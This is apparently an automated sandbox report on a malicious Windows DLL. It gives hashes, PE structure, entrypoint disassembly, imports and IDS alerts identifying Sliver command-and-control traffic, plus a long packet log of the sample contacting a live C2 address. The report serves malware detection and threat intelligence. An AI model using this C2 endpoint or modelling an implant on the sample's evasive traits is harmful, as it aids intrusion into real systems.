                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:5cPRapVOx6.dll
                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                    Original Sample Name:c994bb9982dd689598c6c261090a40cb.dll
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal96.troj.evad.winDLL@14/0@0/1
                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .dll
                                                                                                                                                                                                                    • Override analysis time to 240s for rundll32

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                    • Execution Graph export aborted for target loaddll32.exe, PID 7336 because there are no executed function
                                                                                                                                                                                                                    • Execution Graph export aborted for target regsvr32.exe, PID 7472 because there are no executed function
                                                                                                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7480 because there are no executed function
                                                                                                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7488 because there are no executed function
                                                                                                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7624 because there are no executed function
                                                                                                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7664 because there are no executed function
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • VT rate limit hit for: 5cPRapVOx6.dll

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    05:20:27API Interceptor4x Sleep call for process: regsvr32.exe modified
                                                                                                                                                                                                                    05:20:27API Interceptor16x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                    05:20:36API Interceptor4x Sleep call for process: loaddll32.exe modified

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    MULTIMEDIA-AS-APHoshinMultimediaCenterIncTWS1WVSiZOLX.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                    • 182.234.15.33
                                                                                                                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 111.184.160.75
                                                                                                                                                                                                                    94.156.71.153-sparc-2024-08-29T17_31_55.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 219.70.209.52
                                                                                                                                                                                                                    mirai.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 219.68.92.130
                                                                                                                                                                                                                    firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 61.71.108.201
                                                                                                                                                                                                                    firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 111.185.221.213
                                                                                                                                                                                                                    KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 219.68.229.124
                                                                                                                                                                                                                    SecuriteInfo.com.Riskware.OfferCore.11979.8662.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                                                                                                                                                    • 58.114.252.42
                                                                                                                                                                                                                    unLc6VekkL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 61.70.85.150
                                                                                                                                                                                                                    wKrQaAEaJ4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 203.133.49.52

                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                    No created / dropped files found

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):6.2354339266289
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                    File name:5cPRapVOx6.dll
                                                                                                                                                                                                                    File size:16'616'960 bytes
                                                                                                                                                                                                                    MD5:c994bb9982dd689598c6c261090a40cb
                                                                                                                                                                                                                    SHA1:484932042beb27bec5ab6d96df21ec1418c428a6
                                                                                                                                                                                                                    SHA256:fbce9fc010fdfb67da5ff95cc5a5d1dbb0c07950522f130b031e55831f81b060
                                                                                                                                                                                                                    SHA512:32fa505bdca420313d62279874ac2ef1383a360502d73f0dfbe010913cc136c103159150b4706f46756e2d8cdea9a7442bc7d8c4cff58a67cfd869874044919b
                                                                                                                                                                                                                    SSDEEP:196608:rcRl1WLHnSCf24VHfaRpamWwSOsPlebA:8CLkGMadfNgb
                                                                                                                                                                                                                    TLSH:53F62894F8DB01B7DD0398308963612F1738794E9729DE97C6043F59E8737F20A76A2A
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...)..........................4h................................-T....@... ......................`.....

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:7ae282899bbab082

                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Entrypoint:0x683413b0
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                    Imagebase:0x68340000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                    TLS Callbacks:0x68d1a920, 0x68d1a8e0
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                    Import Hash:7d61210a06b412428471240387e6e605

                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                                                                    mov dword ptr [69305AFCh], 00000000h
                                                                                                                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                    mov edx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                    call 00007F6650FAF787h
                                                                                                                                                                                                                    leave
                                                                                                                                                                                                                    retn 000Ch
                                                                                                                                                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                    lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    sub esp, 18h
                                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                    mov dword ptr [esp], 692C9000h
                                                                                                                                                                                                                    mov dword ptr [esp+04h], eax
                                                                                                                                                                                                                    call 00007F6651989F1Ch
                                                                                                                                                                                                                    leave
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    sub esp, 1Ch
                                                                                                                                                                                                                    mov dword ptr [esp], 68D55000h
                                                                                                                                                                                                                    call dword ptr [693071C0h]
                                                                                                                                                                                                                    sub esp, 04h
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    je 00007F6650FAF9C5h
                                                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                                                    mov dword ptr [esp], 68D55000h
                                                                                                                                                                                                                    call dword ptr [693071F0h]
                                                                                                                                                                                                                    mov edi, dword ptr [693071C8h]
                                                                                                                                                                                                                    sub esp, 04h
                                                                                                                                                                                                                    mov dword ptr [692C9010h], eax
                                                                                                                                                                                                                    mov dword ptr [esp+04h], 68D55013h
                                                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                                                    call edi
                                                                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                    mov dword ptr [esp+04h], 68D55029h
                                                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                                                    call edi
                                                                                                                                                                                                                    sub esp, 08h
                                                                                                                                                                                                                    mov dword ptr [68D1D004h], eax
                                                                                                                                                                                                                    test esi, esi
                                                                                                                                                                                                                    je 00007F6650FAF963h
                                                                                                                                                                                                                    mov dword ptr [esp+04h], 692C9014h
                                                                                                                                                                                                                    mov dword ptr [esp], 692C70DCh
                                                                                                                                                                                                                    call esi
                                                                                                                                                                                                                    mov dword ptr [eax+eax], 00000000h

                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0xfc60000xc8.edata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xfc70000x948.idata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xfca0000x51abc.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xf868a40x18.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xfc71800x144.idata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x10000x9db0480x9db200cff07fee3e3abb1f94253f7e88172127unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .data0x9dd0000x375ec0x37600d45e0b3ccb02d504a2671a8c9f33c7a7False0.45202278498871334data5.528367190252391IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .rdata0xa150000x571d600x571e0061e8437aa5ca4443b2bcbd0fff678b6funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .eh_fram0xf870000x16140x1800913a94f020d2bfb5809620b952703ed6False0.3212890625data4.739076063356027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .bss0xf890000x3cb500x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .edata0xfc60000xc80x200e691d18e4a6e9a4aad43a47bd2efd969False0.3125data2.4343784802397503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .idata0xfc70000x9480xa00b624f79d63c0e351ca9d14ec0b3d66b9False0.40234375data4.892267560679928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .CRT0xfc80000x2c0x20048e8bfe3eb7ed13ef56d96cf035ca0d2False0.05859375data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .tls0xfc90000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .reloc0xfca0000x51abc0x51c00a8046d900ee40c53dda86e817a9080b2False0.5279470087920489data6.586933434674035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    KERNEL32.dllAddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetEnvironmentStringsW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetThreadContext, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MultiByteToWideChar, PostQueuedCompletionStatus, ResumeThread, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                    msvcrt.dll__mb_cur_max, _amsg_exit, _beginthread, _errno, _initterm, _iob, _lock, _unlock, abort, atoi, calloc, fputc, free, fwrite, localeconv, malloc, memcpy, memset, realloc, setlocale, strchr, strerror, strlen, strncmp, vfprintf, wcslen

                                                                                                                                                                                                                    Exports

                                                                                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                                                                                    DllInstall10x68d15140
                                                                                                                                                                                                                    DllRegisterServer20x68d15190
                                                                                                                                                                                                                    DllUnregisterServer30x68d151e0
                                                                                                                                                                                                                    StartW40x68d150a0
                                                                                                                                                                                                                    VoidFunc50x68d150f0
                                                                                                                                                                                                                    _cgo_dummy_export60x6930510c

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-09-27T11:20:30.598642+02002852655ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449746203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:20:30.688055+02002852655ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449747203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:20:30.688142+02002852653ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449748203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:20:33.570205+02002852658ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449750203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:20:36.250198+02002852655ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449752203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:20:39.329950+02002852654ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449754203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:34.774432+02002852653ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449763203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:35.047083+02002852657ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449764203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:37.076557+02002852653ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449767203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:38.064007+02002852658ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449768203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:41.381914+02002852652ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449770203.204.217.1908092TCP
                                                                                                                                                                                                                    2024-09-27T11:22:43.596272+02002852655ETPRO MALWARE Sliver HTTP SessionInit Request1192.168.2.449772203.204.217.1908092TCP

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.470603943 CEST497308082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.475425005 CEST497318082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.475641012 CEST808249730203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.475786924 CEST497308082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.477173090 CEST497308082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.480313063 CEST808249731203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.480411053 CEST497318082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.481462002 CEST497318082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.481952906 CEST808249730203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.486004114 CEST497328082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.486453056 CEST808249731203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.491056919 CEST808249732203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.491174936 CEST497328082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.492108107 CEST497328082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:26.496968031 CEST808249732203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.646927118 CEST808249730203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.646998882 CEST497308082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.647254944 CEST497308082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.652067900 CEST808249730203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.663781881 CEST808249732203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.663856030 CEST497328082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.666421890 CEST497328082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.671327114 CEST808249732203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.673721075 CEST808249731203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.673789024 CEST497318082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.674011946 CEST497318082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:28.678819895 CEST808249731203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:29.294512033 CEST497338082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:29.299578905 CEST808249733203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:29.299688101 CEST497338082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:29.301240921 CEST497338082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:29.306114912 CEST808249733203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:31.540150881 CEST808249733203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:31.540241003 CEST497338082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:31.540505886 CEST497338082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:31.545320988 CEST808249733203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:31.995764017 CEST497348082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:32.001554966 CEST808249734203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:32.001631975 CEST497348082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:32.002424002 CEST497348082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:32.007786989 CEST808249734203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.189575911 CEST808249734203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.189671993 CEST497348082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.189866066 CEST497348082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.194781065 CEST808249734203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.981076956 CEST497358082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.986495972 CEST808249735203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.986571074 CEST497358082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.987976074 CEST497358082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:34.992842913 CEST808249735203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:37.290112019 CEST808249735203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:19:37.290186882 CEST497358082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:37.290354967 CEST497358082192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:19:37.295759916 CEST808249735203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.673969030 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.678922892 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.679018974 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.680557966 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.685414076 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.716195107 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.718393087 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.721194029 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.721293926 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.722107887 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.723237991 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.723311901 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.724116087 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.727066994 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.728929996 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.626269102 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.626600981 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.631946087 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.632028103 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.646058083 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.650939941 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.651006937 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.652786970 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.657614946 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.657740116 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.673208952 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.673355103 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.678991079 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.679049015 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.683161974 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.683372021 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.688555002 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.688611031 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.691692114 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697050095 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697115898 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697854996 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.702379942 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.702811003 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707281113 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707340002 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707678080 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.712551117 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.712604046 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.596457958 CEST809249746203.204.217.190192.168.2.4
